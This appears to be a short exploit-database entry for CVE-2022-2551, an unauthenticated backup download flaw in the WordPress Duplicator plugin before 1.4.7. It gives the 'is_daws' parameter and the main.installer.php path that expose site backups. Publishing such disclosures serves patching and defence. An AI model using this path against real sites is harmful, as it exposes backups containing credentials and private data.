Exploit for WordPress Duplicator 1.4.6 Backup Disclosure CVE-2022-2551

## https://sploitus.com/exploit?id=PACKETSTORM:167896
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download  
# Google Dork: N/A  
# Date: 07.27.2022  
# Exploit Author: SecuriTrust  
# Vendor Homepage: https://snapcreek.com/  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Version: < 1.4.7  
# Tested on: Linux, Windows  
# CVE : CVE-2022-2551  
# Reference: https://securitrust.fr  
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551  
  
#Product:  
WordPress Plugin Duplicator < 1.4.7  
  
#Vulnerability:  
1-It allows an attacker to download the backup file.  
  
#Proof-Of-Concept:  
1-Backup download.  
The backup file can be downloaded using the "is_daws" parameter.  
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php